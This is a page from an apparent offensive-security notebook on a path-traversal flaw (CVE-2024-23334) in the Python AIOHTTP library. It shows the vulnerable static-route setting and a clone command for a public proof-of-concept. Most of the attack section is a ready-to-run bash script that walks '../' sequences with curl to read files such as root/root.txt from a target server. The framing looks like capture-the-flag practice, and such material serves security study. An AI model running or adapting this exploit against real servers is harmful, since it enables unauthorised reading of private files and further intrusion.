🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Basic Commands
      • Linux
      • Git
      • 💾Regex
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
    • Code
      • Python Essentials
      • C & C++
    • Databases
      • MySQL
      • NoSQL
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • Binaries
    • Tools
      • curl
      • Netcat
      • tcpdump
      • Nmap
      • ffuf
      • Gobuster
      • feroxbuster
      • SQLmap
      • 🦈Wireshark
      • Metasploit
      • GoWitness
      • Crunch
      • NetExec
  • Web Exploitation
    • Recon
    • Main Techniques
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Command Injection
      • SQLi
      • Arbitrary File Upload
      • SSTI
      • LFI
      • XSS
    • Web Servers
      • Apache
      • Nginx
      • Werkzeug
    • Web Services/Frameworks
      • Wordpress
      • Laravel
      • Express
      • Magento
      • AIOHTTP
      • HashiCorp Vault
      • Tiny File Manager
      • Joomla
      • CMS Made Simple
      • 🌵Cacti
      • Tomcat
      • Zabbix
      • OpenNetAdmin
      • Java-based web application
        • Struts
        • .WAR
        • JDWP
      • ImageMagick
  • Cloud Exploitation
    • Kubernetes
  • Post Exploitation
    • File Transfer
    • Credential Dumping
      • Thunderbird
    • Pivoting/Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Escaping Docker
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Web Exploitation
  2. Web Services/Frameworks

AIOHTTP

Python library that supports both client and server side of HTTP protocol and Web-Sockets (asyncio)

PreviousMagentoNextHashiCorp Vault

Last updated 1 day ago

CVE-2024-23334 - Path Traversal

Versions : 1.0.5 - 3.9.2

  • This vulnerability has been present since the introduction of the follow_symlinks parameter:

Vulnerable Code
pp.router.add_routes([
    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

  • More information

  • Look at the requests or fuzz the site to look for directories leaking static resources.

PoC

git clone https://github.com/z3rObyte/CVE-2024-23334-PoC

  • Update the URL , payload , and file variables in the PoC to match your target:

Example
#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /

for ((i=0; i<15; i++)); do
   payload+="$string"
   echo "[+] Testing with $payload$file"
   status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
   echo -e "\tStatus code --> $status_code"

   if [[ $status_code -eq 200 ]]; then
       curl -s --path-as-is "$url$payload$file"
       break
   fi
done
LogoWelcome to AIOHTTP — aiohttp 3.11.13 documentation
Documentation
Logoaiohttp vulnerabilities | SnykFind detailed information and remediation guidance for vulnerabilities and misconfigurations.
Vulnerabilities